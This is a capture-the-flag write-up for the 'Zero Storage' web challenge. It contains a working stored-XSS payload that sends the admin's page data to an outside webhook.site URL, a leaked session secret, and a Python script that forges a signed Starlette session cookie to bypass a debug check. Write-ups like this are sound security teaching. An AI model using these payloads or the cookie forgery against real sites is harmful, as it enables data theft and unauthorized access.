ZERO STORAGE - HackMD

# ZERO STORAGE * site : http://zero-storage-eof-ctf.csie.org:1310/ * 如果上傳的是 html，可以成功 XSS * session 裡面就會有 id 和 file_list session, 是 HTTPOnly, 有簽證 * no dns rebind ## FLAG A * for admin to see the xss file needs to be friend * report url `http://zero-storage-eof-ctf.csie.org:1310/befriend?friend_name=cclin0816` * report XSS view `http://zero-storage-eof-ctf.csie.org:1310/view?filename=-7uQTJAfMBqTnV-vFW7C4YK3gtK2wj-7.html` ```html= <script> fetch("http://zero-storage-eof-ctf.csie.org:1310/home") .then((response) => response.text()) .then((data) => { let parser = new DOMParser(); let doc = parser.parseFromString(data, 'text/html'); let f = doc.getElementsByClassName("pure-u-1")[2].getElementsByTagName("a")[0].innerText fetch( "https://webhook.site/127c4204-b073-4598-bbff-fd3afe6bffa5/?res=" + f ); }) .catch((error) => { fetch( "https://webhook.site/127c4204-b073-4598-bbff-fd3afe6bffa5/?res=" + btoa(error) ); }); </script> ``` * get the filename of flag and see it `http://zero-storage-eof-ctf.csie.org:1310/view?filename=maSAAkI-kiSHIbE-sONG-for-1310_hepHNKnZQntYd0pd.txt` * FLAG{i_guess_I_run_OuT_of_IDEAs_ABouT_NuMbers......} ## FLAG B ```python async def debug_user(request): if not request.session.get('debug', False): return TemplateResponse('show.html', {'request': request, 'note': 'Permission denied'}) uid = request.query_params.get('id', request.session.get('id', -1)) async with db.execute('SELECT user, pass FROM users WHERE id = ?', (uid, )) as cursor: row = await cursor.fetchone() user, pas = (None, None) if row is None else row return TemplateResponse('show.html', { 'request': request, 'pre': True, 'note': f'''id : {uid} name: {user} pass: {pas} ''' }) ``` * error page (access 不存在的頁面) 可以看到 middleware 的 secret key ```Ludibrium-Secret-133.221.333.123.111_kvYAtbZkwkhyPv5B``` * session 中的 debug 要是 True，若 session 中沒有 debug 就會自動是 False * [Starlette Source](https://github.com/encode/starlette/blob/master/starlette/middleware/sessions.py) 裡面有 load cookie 的部分 ![](https://i.imgur.com/NJ1SF3Z.png) * 用這個腳本生 session，在 load ```http://zero-storage-eof-ctf.csie.org:1310/debug_user?debug_user=admin``` 的時候送 (可以用 burpsuite) ```python= from base64 import b64decode, b64encode import itsdangerous, json signer = itsdangerous.TimestampSigner("Ludibrium-Secret-133.221.333.123.111_kvYAtbZkwkhyPv5B") payload = {"id": 0, "filenames": [], "debug": True} data = b64encode(json.dumps(payload).encode("utf-8")) max_age = 14 * 24 * 60 * 60 print(signer.sign(data)) ``` * FLAG{DO_u_rEMEmBeR_LudiBRIUM_s_Funny_tIME_makeR_bgM?} ###### tags: `solved`